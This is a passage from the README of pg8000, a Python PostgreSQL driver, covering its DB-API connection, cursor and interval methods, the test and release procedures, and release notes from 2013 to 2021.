`ProgrammingError` is\nraised, if the application calls `commit()` or `rollback()` during an active\nTPC transaction.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_commit(xid=None)\n\nWhen called with no arguments, `tpc_commit()` commits a TPC transaction\npreviously prepared with `tpc_prepare()`. If `tpc_commit()` is called prior to\n`tpc_prepare()`, a single phase commit is performed. A transaction manager may\nchoose to do this if only a single resource is participating in the global\ntransaction.\n\nWhen called with a transaction ID `xid`, the database commits the given\ntransaction. If an invalid transaction ID is provided, a\nProgrammingError will be raised. This form should be called outside of\na transaction, and is intended for use in recovery.\n\nOn return, the TPC transaction is ended.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_prepare()\n\nPerforms the first phase of a transaction started with .tpc_begin(). A\nProgrammingError is be raised if this method is called outside of a TPC\ntransaction.\n\nAfter calling `tpc_prepare()`, no statements can be executed until\n`tpc_commit()` or `tpc_rollback()` have been called.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_recover()\n\nReturns a list of pending transaction IDs suitable for use with\n`tpc_commit(xid)` or `tpc_rollback(xid)`\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Connection.tpc_rollback(xid=None)\n\nWhen called with no arguments, `tpc_rollback()` rolls back a TPC transaction.\nIt may be called before or after `tpc_prepare()`.\n\nWhen called with a transaction ID xid, it rolls back the given transaction. If\nan invalid transaction ID is provided, a `ProgrammingError` is raised. This\nform should be called outside of a transaction, and is intended for use in\nrecovery.\n\nOn return, the TPC transaction is ended.\n\nThis function is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n===== pg8000.dbapi.Connection.xid(format_id, global_transaction_id, branch_qualifier)\n\nCreate a Transaction IDs (only global_transaction_id is used in pg) format_id\nand branch_qualifier are not used in postgres global_transaction_id may be any\nstring identifier supported by postgres returns a tuple (format_id,\nglobal_transaction_id, branch_qualifier)\n\n\n==== pg8000.dbapi.Cursor\n\nA cursor object is returned by the `pg8000.dbapi.Connection.cursor()` method\nof a connection. It has the following attributes and methods:\n\n===== pg8000.dbapi.Cursor.arraysize\n\nThis read\/write attribute specifies the number of rows to fetch at a time with\n`pg8000.dbapi.Cursor.fetchmany()`. It defaults to 1.\n\n\n===== pg8000.dbapi.Cursor.connection\n\nThis read-only attribute contains a reference to the connection object\n(an instance of `pg8000.dbapi.Connection`) on which the cursor was created.\n\nThis attribute is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.rowcount\n\nThis read-only attribute contains the number of rows that the last\n`execute()` or `executemany()` method produced (for query statements like\n`SELECT`) or affected (for modification statements like `UPDATE`.\n\nThe value is -1 if:\n\n* No `execute()` or `executemany()` method has been performed yet on the\n cursor.\n* There was no rowcount associated with the last `execute()`.\n* At least one of the statements executed as part of an `executemany()` had no\n row count associated with it.\n* Using a `SELECT` query statement on a PostgreSQL server older than version\n 9.\n* Using a `COPY` query statement on PostgreSQL server version 8.1 or older.\n\nThis attribute is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.description\n\nThis read-only attribute is a sequence of 7-item sequences. Each value contains\ninformation describing one result column. The 7 items returned for each column\nare (name, type_code, display_size, internal_size, precision, scale, null_ok).\nOnly the first two values are provided by the current implementation.\n\nThis attribute is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.close()\n\nCloses the cursor.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.execute(operation, args=None, stream=None)\n\nExecutes a database operation. Parameters may be provided as a sequence, or as\na mapping, depending upon the value of `pg8000.paramstyle`. Returns the cursor,\nwhich may be iterated over.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\noperation::\n The SQL statement to execute.\n\nargs::\n If `pg8000.dbapi.paramstyle` is `qmark`, `numeric`, or `format`, this\nargument should be an array of parameters to bind into the statement. If\n`pg8000.dbapi.paramstyle` is `named`, the argument should be a `dict` mapping of\nparameters. If `pg8000.dbapi.paramstyle' is `pyformat`, the argument value may be\neither an array or a mapping.\n\nstream::\n This is a pg8000 extension for use with the PostgreSQL\nhttp:\/\/www.postgresql.org\/docs\/current\/static\/sql-copy.html[COPY] command. For\na `COPY FROM` the parameter must be a readable file-like object, and for\n`COPY TO` it must be writable.\n\nNew in version 1.9.11.\n\n\n===== pg8000.dbapi.Cursor.executemany(operation, param_sets)\n\nPrepare a database operation, and then execute it against all parameter\nsequences or mappings provided.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\noperation::\n The SQL statement to execute.\nparameter_sets::\n A sequence of parameters to execute the statement with. The values in the\n sequence should be sequences or mappings of parameters, the same as the args\n argument of the `pg8000.dbapi.Cursor.execute()` method.\n\n\n===== pg8000.dbapi.Cursor.callproc(procname, parameters=None)\n\nCall a stored database procedure with the given name and optional parameters.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\nprocname::\n The name of the procedure to call.\n\nparameters::\n A list of parameters.\n\n\n===== pg8000.dbapi.Cursor.fetchall()\n\nFetches all remaining rows of a query result.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: A sequence, each entry of which is a sequence of field values making\nup a row.\n\n\n===== pg8000.dbapi.Cursor.fetchmany(size=None)\n\nFetches the next set of rows of a query result.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nsize::\n The number of rows to fetch when called. If not provided, the\n `pg8000.dbapi.Cursor.arraysize` attribute value is used instead.\n\nReturns: A sequence, each entry of which is a sequence of field values making\nup a row. If no more rows are available, an empty sequence will be returned.\n\n\n===== pg8000.dbapi.Cursor.fetchone()\n\nFetch the next row of a query result set.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\nReturns: A row as a sequence of field values, or `None` if no more rows are\navailable.\n\n\n===== pg8000.dbapi.Cursor.setinputsizes(*sizes)\n\nUsed to set the parameter types of the next query. This is useful if it's\ndifficult for pg8000 to work out the types from the parameters themselves\n(eg. for parameters of type None).\n\nsizes::\n Positional parameters that are either the Python type of the parameter to be\n sent, or the PostgreSQL oid. Common oids are available as constants such as\n pg8000.STRING, pg8000.INTEGER, pg8000.TIME etc.\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification].\n\n\n===== pg8000.dbapi.Cursor.setoutputsize(size, column=None)\n\nThis method is part of the\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DBAPI 2.0 specification], however, it\nis not implemented by pg8000.\n\n\n==== pg8000.dbapi.Interval\n\nAn Interval represents a measurement of time. In PostgreSQL, an interval is\ndefined in the measure of months, days, and microseconds; as such, the pg8000\ninterval type represents the same information.\n\nNote that values of the `pg8000.Interval.microseconds`, `pg8000.Interval.days`,\nand `pg8000.Interval.months` properties are independently measured and cannot\nbe converted to each other. A month may be 28, 29, 30, or 31 days, and a day\nmay occasionally be lengthened slightly by a leap second.\n\n\n===== pg8000.dbapi.Interval.microseconds\n\nMeasure of microseconds in the interval.\n\nThe microseconds value is constrained to fit into a signed 64-bit integer. Any\nattempt to set a value too large or too small will result in an OverflowError\nbeing raised.\n\n\n===== pg8000.dbapi.Interval.days\n\nMeasure of days in the interval.\n\nThe days value is constrained to fit into a signed 32-bit integer. Any attempt\nto set a value too large or too small will result in an OverflowError being\nraised.\n\n\n===== pg8000.dbapi.Interval.months\n\nMeasure of months in the interval.\n\nThe months value is constrained to fit into a signed 32-bit integer. Any\nattempt to set a value too large or too small will result in an OverflowError\nbeing raised.\n\n\n== Tests\n\nInstall http:\/\/testrun.org\/tox\/latest\/[tox]:\n\n pip install tox\n\nEnable the PostgreSQL hstore extension by running the SQL command:\n\n create extension hstore;\n\nand add a line to pg_hba.conf for the various authentication options:\n\n....\nhost pg8000_md5 all 127.0.0.1\/32 md5\nhost pg8000_gss all 127.0.0.1\/32 gss\nhost pg8000_password all 127.0.0.1\/32 password\nhost pg8000_scram_sha_256 all 127.0.0.1\/32 scram-sha-256\nhost all all 127.0.0.1\/32 trust\n....\n\nthen run `tox` from the `pg8000` directory:\n\n`tox`\n\nThis will run the tests against the Python version of the virtual environment,\non the machine, and the installed PostgreSQL version listening on port 5432, or\nthe `PGPORT` environment variable if set.\n\nBenchmarks are run as part of the test suite at `tests\/test_benchmarks.py`.\n\n\n== Doing A Release Of pg8000\n\nRun `tox` to make sure all tests pass, then update the release notes, then do:\n\n....\ngit tag -a x.y.z -m \"version x.y.z\"\nrm -r build\nrm -r dist\npython setup.py sdist bdist_wheel --python-tag py3\nfor f in dist\/*; do gpg --detach-sign -a $f; done\ntwine upload dist\/*\n....\n\n\n== Release Notes\n\n=== Version 1.19.1, 2021-04-03\n\n* Fix bug where setinputsizes() was only used for the first parameter set of\n executemany().\n\n* Support more PostgreSQL array types.\n\n\n=== Version 1.19.0, 2021-03-28\n\n* Network error exceptions are now wrapped in an `InterfaceError`, with the\n original exception as the cause. The error message for network errors allways\n start with the string `network error`.\n\n* Upgraded to version 1.3.0 of Scramp, which has better error handling.\n\n\n=== Version 1.18.0, 2021-03-06\n\n* The `pg8000.dbapi.Cursor.callproc()` method is now implemented.\n\n* SCRAM channel binding is now supported. That means SCRAM mechanisms ending in\n '-PLUS' such as SCRAM-SHA-256-PLUS are now supported when connecting to the\n server.\n\n* A custom attribute `ssl.SSLContext.request_ssl` can be set to `False` to\n tell pg8000 to connect using an SSL socket, but to not request SSL from\n the PostgreSQL server. This is useful if you're connecting to a PostgreSQL\n server that's behind an SSL proxy.\n\n\n=== Version 1.17.0, 2021-01-30\n\n* The API is now split in two, pg8000.native and pg8000.dbapi. The legacy API\n still exists in this release, but will be removed in another release. The\n idea is that pg8000.dbapi can stick strictly to the DB-API 2 specification,\n while pg8000.native can focus on useability without having to worry about\n compatibility with the DB-API standard.\n\n* The column name in `Connection.description` used to be returned as a\n `bytes` but now it's returned as a `str`.\n\n* Removed extra wrapper types PGJson, PGEnum etc. These were never properly\n documented and the problem they solve can be solved using CAST in the SQL or\n by using setinputsizes.\n\n\n\n=== Version 1.16.6, 2020-10-10\n\n* The column name in `Connection.description` used to be returned as a\n `bytes` but now it's returned as a `str`.\n\n* Removed extra wrapper types PGJson, PGEnum etc. These were never properly\n documented and the problem they solve can be solved using CAST in the SQL or\n by using setinputsizes.\n\n\n=== Version 1.16.5, 2020-08-07\n\n* The TPC method `Connection.tpc_prepare()` was broken.\n\n\n=== Version 1.16.4, 2020-08-03\n\n* Include the `payload` in the tuples in `Connection.notifications`.\n* More constants (eg. `DECIMAL` and `TEXT_ARRAY`) are now available for\n PostgreSQL types that are used in `setinputsizes()`.\n\n\n=== Version 1.16.3, 2020-07-26\n\n* If an unrecognized parameter is sent to `Cursor.setinputsizes()` use the\n `pg8000.UNKNOWN` type (705).\n* When communicating with a PostgreSQL server with version < 8.2.0, `FETCH`\n commands don't have a row count.\n* Include in the source distribution all necessary test files from the `test`\n directory in\n\n\n=== Version 1.16.2, 2020-07-25\n\n* Use the\n https:\/\/www.postgresql.org\/docs\/current\/protocol-flow.html#id-1.10.5.7.4[simple query]\n cycle for queries that don't have parameters. This should give a performance\n improvement and also means that multiple statements can be executed in one go\n (as long as they don't have parameters) whereas previously the `sqlparse` had\n to be used.\n\n\n=== Version 1.16.1, 2020-07-18\n\n* Enable the `Cursor.setinputsizes()` method. Previously this method didn't\n do anything. It's an optional method of the DBAPI 2.0 specification.\n\n\n=== Version 1.16.0, 2020-07-11\n\n* This is a backwardly incompatible release of pg8000.\n\n* All data types are now sent as text rather than binary.\n\n* Using adapters, custom types can be plugged in to pg8000.\n\n* Previously, named prepared statements were used for all statements.\n Now unnamed prepared statements are used by default, and named prepared\n statements can be used explicitly by calling the Connection.prepare()\n method, which returns a PreparedStatement object.\n\n\n=== Version 1.15.3, 2020-06-14\n\n* For TCP connections (as opposed to Unix socket connections) the\n https:\/\/docs.python.org\/3\/library\/socket.html#socket.create_connection[`socket.create_connection`]\n function is now used. This means pg8000 now works with IPv6 as well as IPv4.\n\n* Better error messages for failed connections. A 'cause' exception is now\n added to the top-level pg8000 exception, and the error message contains the\n details of what was being connected to (host, port etc.).\n\n\n=== Version 1.15.2, 2020-04-16\n\n* Added a new method `run()` to the connection, which lets you run queries\n directly without using a `Cursor`. It always uses the `named` parameter\n style, and the parameters are provided using keyword arguments. There are now\n two sets of interactive examples, one using the pg8000 extensions, and one\n using just DB-API features.\n\n* Better error message if certain parameters in the `connect()` function are of\n the wrong type.\n\n* The constructor of the `Connection` class now has the same signature as the\n `connect()` function, which makes it easier to use the `Connection` class\n directly if you want to.\n\n\n=== Version 1.15.1, 2020-04-04\n\n* Up to now the only supported way to create a new connection was to use the\n `connect()` function. However, some people are using the `Connect` class\n directly and this change makes it a bit easier to do that by making the class\n use a contructor which has the same signature as the `connect()` function.\n\n\n=== Version 1.15.0, 2020-04-04\n\n* Abandon the idea of arbitrary `init_params` in the connect() function. We now\n go back to having a fixed number of arguments. The argument `replication` has\n been added as this is the only extra init param that was needed. The reason\n for going back to a fixed number of aguments is that you get better feedback\n if you accidently mis-type a parameter name.\n\n* The `max_prepared_statements` parameter has been moved from being a module\n property to being an argument of the connect() function.\n\n\n=== Version 1.14.1, 2020-03-23\n\n* Ignore any `init_params` that have a value of `None`. This seems to be more\n useful and the behaviour is more expected.\n\n\n=== Version 1.14.0, 2020-03-21\n\n* Tests are now included in the source distribution.\n\n* Any extra keyword parameters of the `connect()` function are sent as\n initialization parameters when the PostgreSQL session starts. See the API\n docs for more information. Thanks to Patrick Hayes for suggesting this.\n\n* The ssl.wrap_socket function is deprecated, so we now give the user the\n option of using a default `SSLContext` or to pass in a custom one. This is a\n backwardly incompatible change. See the API docs for more info. Thanks to\n Jonathan Ross Rogers <jrogers@emphasys-software.com> for his work on this.\n\n* Oversized integers are now returned as a `Decimal` type, whereas before a\n `None` was returned. Thanks to Igor Kaplounenko <igor.kaplounenko@intel.com>\n for his work on this.\n\n* Allow setting of connection source address in the `connect()` function. See\n the API docs for more details. Thanks to David King\n <davidking@davids-mbp.home> for his work on this.\n\n\n=== Version 1.13.2, 2019-06-30\n\n* Use the https:\/\/pypi.org\/project\/scramp\/[Scramp] library for the SCRAM\n implementation.\n\n* Fixed bug where SQL such as `make_interval(days := 10)` fail on the `:=`\n part. Thanks to https:\/\/github.com\/sanepal[sanepal] for reporting this.\n\n\n=== Version 1.13.1, 2019-02-06\n\n* We weren't correctly uploading releases to PyPI, which led to confusion\n when dropping Python 2 compatibility. Thanks to\n https:\/\/github.com\/piroux[Pierre Roux] for his\n https:\/\/github.com\/tlocke\/pg8000\/issues\/7[detailed explanation] of what\n went wrong and how to correct it.\n\n* Fixed bug where references to the `six` library were still in the code, even\n though we don't use `six` anymore.\n\n\n=== Version 1.13.0, 2019-02-01\n\n* Remove support for Python 2.\n\n* Support the scram-sha-256 authentication protocol. Reading through the\n https:\/\/github.com\/cagdass\/scrampy code was a great help in implementing\n this, so thanks to https:\/\/github.com\/cagdass[cagdass] for his code.\n\n\n=== Version 1.12.4, 2019-01-05\n\n* Support the PostgreSQL cast operator `::` in SQL statements.\n\n* Added support for more advanced SSL options. See docs on `connect` function\n for more details.\n\n* TCP keepalives enabled by default, can be set in the `connect` function.\n\n* Fixed bug in array dimension calculation.\n\n* Can now use the `with` keyword with connection objects.\n\n\n=== Version 1.12.3, 2018-08-22\n\n* Make PGVarchar and PGText inherit from `str`. Simpler than inheriting from\n a PGType.\n\n\n=== Version 1.12.2, 2018-06-28\n\n* Add PGVarchar and PGText wrapper types. This allows fine control over the\n string type that is sent to PostgreSQL by pg8000.\n\n\n=== Version 1.12.1, 2018-06-12\n\n\n* Revert back to the Python 3 `str` type being sent as an `unknown` type,\n rather than the `text` type as it was in the previous release. The reason is\n that with the `unknown` type there's the convenience of using a plain Python\n string for JSON, Enum etc. There's always the option of using the\n `pg8000.PGJson` and `pg8000.PGEnum` wrappers if precise control over the\n PostgreSQL type is needed.\n\n\n=== Version 1.12.0, 2018-06-12\n\nNote that this version is not backward compatible with previous versions.\n\n* The Python 3 `str` type was sent as an `unknown` type, but now it's sent as\n the nearest PostgreSQL type `text`.\n\n* pg8000 now recognizes that inline SQL comments end with a newline.\n\n* Single `%` characters now allowed in SQL comments.\n\n* The wrappers `pg8000.PGJson`, `pg8000.PGJsonb` and `pg8000.PGTsvector` can\n now be used to contain Python values to be used as parameters. The wrapper\n `pg8000.PGEnum` can by used for Python 2, as it doesn't have a standard\n `enum.Enum` type.\n\n\n=== Version 1.11.0, 2017-08-16\n\nNote that this version is not backward compatible with previous versions.\n\n* The Python `int` type was sent as an `unknown` type, but now it's sent as the\n nearest matching PostgreSQL type. Thanks to Patrick Hayes.\n\n* Prepared statements are now closed on the server when pg8000 clears them from\n its cache.\n\n* Previously a `%` within an SQL literal had to be escaped, but this is no\n longer the case.\n\n* Notifications, notices and parameter statuses are now handled by simple\n `dequeue` buffers. See docs for more details.\n\n* Connections and cursors are no longer threadsafe. So to be clear, neither\n connections or cursors should be shared between threads. One thread per\n connection is mandatory now. This has been done for performance reasons, and\n to simplify the code.\n\n* Rather than reading results from the server in batches, pg8000 now always\n downloads them in one go. This avoids `portal closed` errors and makes things\n a bit quicker, but now one has to avoid downloading too many rows in a single\n query.\n\n* Attempts to return something informative if the returned PostgreSQL timestamp\n value is outside the range of the Python datetime.\n\n* Allow empty arrays as parameters, assume they're of string type.\n\n* The cursor now has a context manager, so it can be used with the `with`\n keyword. Thanks to Ildar Musin.\n\n* Add support for `application_name` parameter when connecting to database,\n issue https:\/\/github.com\/mfenniak\/pg8000\/pull\/106[#106]. Thanks to\n https:\/\/github.com\/vadv[@vadv] for the contribution.\n\n* Fix warnings from PostgreSQL \"not in a transaction\", when calling\n ``.rollback()`` while not in a transaction, issue\n https:\/\/github.com\/mfenniak\/pg8000\/issues\/113[#113]. Thanks to\n https:\/\/github.com\/jamadden[@jamadden] for the contribution.\n\n* Errors from the server are now always passed through in full.\n\n\n=== Version 1.10.6, 2016-06-10\n\n* Fixed a problem where we weren't handling the password connection parameter\n correctly. Now it's handled in the same way as the 'user' and 'database'\n parameters, ie. if the password is bytes, then pass it straight through to the\n database, if it's a string then encode it with utf8.\n\n* It used to be that if the 'user' parameter to the connection function was\n 'None', then pg8000 would try and look at environment variables to find a\n username. Now we just go by the 'user' parameter only, and give an error if\n it's None.\n\n\n=== Version 1.10.5, 2016-03-04\n\n- Include LICENCE text and sources for docs in the source distribution (the\n tarball).\n\n\n=== Version 1.10.4, 2016-02-27\n\n* Fixed bug where if a str is sent as a query parameter, and then with the same\n cursor an int is sent instead of a string, for the same query, then it fails.\n\n* Under Python 2, a str type is now sent 'as is', ie. as a byte string rather\n than trying to decode and send according to the client encoding. Under Python\n 2 it's recommended to send text as unicode() objects.\n\n* Dropped and added support for Python versions. Now pg8000 supports\n Python 2.7+ and Python 3.3+.\n\n* Dropped and added support for PostgreSQL versions. Now pg8000 supports\n PostgreSQL 9.1+.\n\n* pg8000 uses the 'six' library for making the same code run on both Python 2\n and Python 3. We used to include it as a file in the pg8000 source code. Now\n we have it as a separate dependency that's installed with 'pip install'. The\n reason for doing this is that package maintainers for OS distributions\n prefer unbundled libaries.\n\n\n=== Version 1.10.3, 2016-01-07\n\n* Removed testing for PostgreSQL 9.0 as it's not longer supported by the\n PostgreSQL Global Development Group.\n* Fixed bug where pg8000 would fail with datetimes if PostgreSQL was compiled\n with the integer_datetimes option set to 'off'. The bug was in the\n timestamp_send_float function.\n\n\n=== Version 1.10.2, 2015-03-17\n\n* If there's a socket exception thrown when communicating with the database,\n it is now wrapped in an OperationalError exception, to conform to the DB-API\n spec.\n\n* Previously, pg8000 didn't recognize the EmptyQueryResponse (that the server\n sends back if the SQL query is an empty string) now we raise a\n ProgrammingError exception.\n\n* Added socket timeout option for Python 3.\n\n* If the server returns an error, we used to initialize the ProgramerException\n with just the first three fields of the error. Now we initialize the\n ProgrammerException with all the fields.\n\n* Use relative imports inside package.\n\n* User and database names given as bytes. The user and database parameters of\n the connect() function are now passed directly as bytes to the server. If the\n type of the parameter is unicode, pg8000 converts it to bytes using the uft8\n encoding.\n\n* Added support for JSON and JSONB Postgres types. We take the approach of\n taking serialized JSON (str) as an SQL parameter, but returning results as\n de-serialized JSON (Python objects). See the example in the Quickstart.\n\n* Added CircleCI continuous integration.\n\n* String support in arrays now allow letters like \"u\", braces and whitespace.\n\n\n=== Version 1.10.1, 2014-09-15\n\n* Add support for the Wheel package format.\n\n* Remove option to set a connection timeout. For communicating with the server,\n pg8000 uses a file-like object using socket.makefile() but you can't use this\n if the underlying socket has a timeout.\n\n\n=== Version 1.10.0, 2014-08-30\n\n* Remove the old ``pg8000.dbapi`` and ``pg8000.DBAPI`` namespaces. For example,\n now only ``pg8000.connect()`` will work, and ``pg8000.dbapi.connect()``\n won't work any more.\n\n* Parse server version string with LooseVersion. This should solve the problems\n that people have been having when using versions of PostgreSQL such as\n ``9.4beta2``.\n\n* Message if portal suspended in autocommit. Give a proper error message if the\n portal is suspended while in autocommit mode. The error is that the portal is\n closed when the transaction is closed, and so in autocommit mode the portal\n will be immediately closed. The bottom line is, don't use autocommit mode if\n there's a chance of retrieving more rows than the cache holds (currently 100).\n\n\n=== Version 1.9.14, 2014-08-02\n\n* Make ``executemany()`` set ``rowcount``. Previously, ``executemany()`` would\n always set ``rowcount`` to -1. Now we set it to a meaningful value if\n possible. If any of the statements have a -1 ``rowcount`` then then the\n ``rowcount`` for the ``executemany()`` is -1, otherwise the ``executemany()``\n ``rowcount`` is the sum of the rowcounts of the individual statements.\n\n* Support for password authentication. pg8000 didn't support plain text\n authentication, now it does.\n\n\n=== Version 1.9.13, 2014-07-27\n\n* Reverted to using the string ``connection is closed`` as the message of the\n exception that's thrown if a connection is closed. For a few versions we were\n using a slightly different one with capitalization and punctuation, but we've\n reverted to the original because it's easier for users of the library to\n consume.\n\n* Previously, ``tpc_recover()`` would start a transaction if one was not already\n in progress. Now it won't.\n\n\n=== Version 1.9.12, 2014-07-22\n\n* Fixed bug in ``tpc_commit()`` where a single phase commit failed.\n\n\n=== Version 1.9.11, 2014-07-20\n\n* Add support for two-phase commit DBAPI extension. Thanks to Mariano Reingart's\n TPC code on the Google Code version:\n\n https:\/\/code.google.com\/p\/pg8000\/source\/detail?r=c8609701b348b1812c418e2c7\n\n on which the code for this commit is based.\n\n* Deprecate ``copy_from()`` and ``copy_to()`` The methods ``copy_from()`` and\n ``copy_to()`` of the ``Cursor`` object are deprecated because it's simpler and\n more flexible to use the ``execute()`` method with a ``fileobj`` parameter.\n\n* Fixed bug in reporting unsupported authentication codes. Thanks to\n https:\/\/github.com\/hackgnar for reporting this and providing the fix.\n\n* Have a default for the ``user`` paramater of the ``connect()`` function. If\n the ``user`` parameter of the ``connect()`` function isn't provided, look\n first for the ``PGUSER`` then the ``USER`` environment variables. Thanks to\n Alex Gaynor https:\/\/github.com\/alex for this suggestion.\n\n* Before PostgreSQL 8.2, ``COPY`` didn't give row count. Until PostgreSQL 8.2\n (which includes Amazon Redshift which forked at 8.0) the ``COPY`` command\n didn't return a row count, but pg8000 thought it did. That's fixed now.\n\n\n=== Version 1.9.10, 2014-06-08\n\n* Remember prepared statements. Now prepared statements are never closed, and\n pg8000 remembers which ones are on the server, and uses them when a query is\n repeated. This gives an increase in performance, because on subsequent\n queries the prepared statement doesn't need to be created each time.\n\n* For performance reasons, pg8000 never closed portals explicitly, it just\n let the server close them at the end of the transaction. However, this can\n cause memory problems for long running transactions, so now pg800 always\n closes a portal after it's exhausted.\n\n* Fixed bug where unicode arrays failed under Python 2. Thanks to\n https:\/\/github.com\/jdkx for reporting this.\n\n* A FLUSH message is now sent after every message (except SYNC). This is in\n accordance with the protocol docs, and ensures the server sends back its\n responses straight away.\n\n\n=== Version 1.9.9, 2014-05-12\n\n* The PostgreSQL interval type is now mapped to datetime.timedelta where\n possible. Previously the PostgreSQL interval type was always mapped to the\n pg8000.Interval type. However, to support the datetime.timedelta type we\n now use it whenever possible. Unfortunately it's not always possible because\n timedelta doesn't support months. If months are needed then the fall-back\n is the pg8000.Interval type. This approach means we handle timedelta in a\n similar way to other Python PostgreSQL drivers, and it makes pg8000\n compatible with popular ORMs like SQLAlchemy.\n\n* Fixed bug in executemany() where a new prepared statement should be created\n for each variation in the oids of the parameter sets.\n\n\n=== Version 1.9.8, 2014-05-05\n\n* We used to ask the server for a description of the statement, and then ask\n for a description of each subsequent portal. We now only ask for a\n description of the statement. This results in a significant performance\n improvement, especially for executemany() calls and when using the\n 'use_cache' option of the connect() function.\n\n* Fixed warning in Python 3.4 which was saying that a socket hadn't been\n closed. It seems that closing a socket file doesn't close the underlying\n socket.\n\n* Now should cope with PostgreSQL 8 versions before 8.4. This includes Amazon\n Redshift.\n\n* Added 'unicode' alias for 'utf-8', which is needed for Amazon Redshift.\n\n* Various other bug fixes.\n\n\n=== Version 1.9.7, 2014-03-26\n\n* Caching of prepared statements. There's now a 'use_cache' boolean parameter\n for the connect() function, which causes all prepared statements to be cached\n by pg8000, keyed on the SQL query string. This should speed things up\n significantly in most cases.\n\n* Added support for the PostgreSQL inet type. It maps to the Python types\n IPv*Address and IPv*Network.\n\n* Added support for PostgreSQL +\/- infinity date and timestamp values. Now the\n Python value datetime.datetime.max maps to the PostgreSQL value 'infinity'\n and datetime.datetime.min maps to '-infinity', and the same for\n datetime.date.\n\n* Added support for the PostgreSQL types int2vector and xid, which are mostly\n used internally by PostgreSQL.\n\n\n=== Version 1.9.6, 2014-02-26\n\n* Fixed a bug where 'portal does not exist' errors were being generated. Some\n queries that should have been run in a transaction were run in autocommit\n mode and so any that suspended a portal had the portal immediately closed,\n because a portal can only exist within a transaction. This has been solved by\n determining the transaction status from the READY_FOR_QUERY message.\n\n\n=== Version 1.9.5, 2014-02-15\n\n* Removed warn() calls for __next__() and __iter__(). Removing the warn() in\n __next__() improves the performance tests by ~20%.\n\n* Increased performance of timestamp by ~20%. Should also improve timestamptz.\n\n* Moved statement_number and portal_number from module to Connection. This\n should reduce lock contention for cases where there's a single module and\n lots of connections.\n\n* Make decimal_out\/in and time_in use client_encoding. These functions used to\n assume ascii, and I can't think of a case where that wouldn't work.\n Nonetheless, that theoretical bug is now fixed.\n\n* Fixed a bug in cursor.executemany(), where a non-None parameter in a sequence\n of parameters, is None in a subsequent sequence of parameters.\n\n\n=== Version 1.9.4, 2014-01-18\n\n* Fixed a bug where with Python 2, a parameter with the value Decimal('12.44'),\n (and probably other numbers) isn't sent correctly to PostgreSQL, and so the\n command fails. This has been fixed by sending decimal types as text rather\n than binary. I'd imagine it's slightly faster too.\n\n\n=== Version 1.9.3, 2014-01-16\n\n* Fixed bug where there were missing trailing zeros after the decimal point in\n the NUMERIC type. For example, the NUMERIC value 1.0 was returned as 1 (with\n no zero after the decimal point).\n\n This is fixed this by making pg8000 use the text rather than binary\n representation for the numeric type. This actually doubles the speed of\n numeric queries.\n\n\n=== Version 1.9.2, 2013-12-17\n\n* Fixed incompatibility with PostgreSQL 8.4. In 8.4, the CommandComplete\n message doesn't return a row count if the command is SELECT. We now look at\n the server version and don't look for a row count for a SELECT with version\n 8.4.\n\n\n=== Version 1.9.1, 2013-12-15\n\n* Fixed bug where the Python 2 'unicode' type wasn't recognized in a query\n parameter.\n\n\n=== Version 1.9.0, 2013-12-01\n\n* For Python 3, the :class:`bytes` type replaces the :class:`pg8000.Bytea`\n type. For backward compatibility the :class:`pg8000.Bytea` still works under\n Python 3, but its use is deprecated.\n\n* A single codebase for Python 2 and 3.\n\n* Everything (functions, properties, classes) is now available under the\n ``pg8000`` namespace. So for example:\n\n * pg8000.DBAPI.connect() -> pg8000.connect()\n * pg8000.DBAPI.apilevel -> pg8000.apilevel\n * pg8000.DBAPI.threadsafety -> pg8000.threadsafety\n * pg8000.DBAPI.paramstyle -> pg8000.paramstyle\n * pg8000.types.Bytea -> pg8000.Bytea\n * pg8000.types.Interval -> pg8000.Interval\n * pg8000.errors.Warning -> pg8000.Warning\n * pg8000.errors.Error -> pg8000.Error\n * pg8000.errors.InterfaceError -> pg8000.InterfaceError\n * pg8000.errors.DatabaseError -> pg8000.DatabaseError\n\n The old locations are deprecated, but still work for backward compatibility.\n\n* Lots of performance improvements.\n\n * Faster receiving of ``numeric`` types.\n * Query only parsed when PreparedStatement is created.\n * PreparedStatement re-used in executemany()\n * Use ``collections.deque`` rather than ``list`` for the row cache. We're\n adding to one end and removing from the other. This is O(n) for a list but\n O(1) for a deque.\n * Find the conversion function and do the format code check in the\n ROW_DESCRIPTION handler, rather than every time in the ROW_DATA handler.\n * Use the 'unpack_from' form of struct, when unpacking the data row, so we\n don't have to slice the data.\n * Return row as a list for better performance. At the moment result rows are\n turned into a tuple before being returned. Returning the rows directly as a\n list speeds up 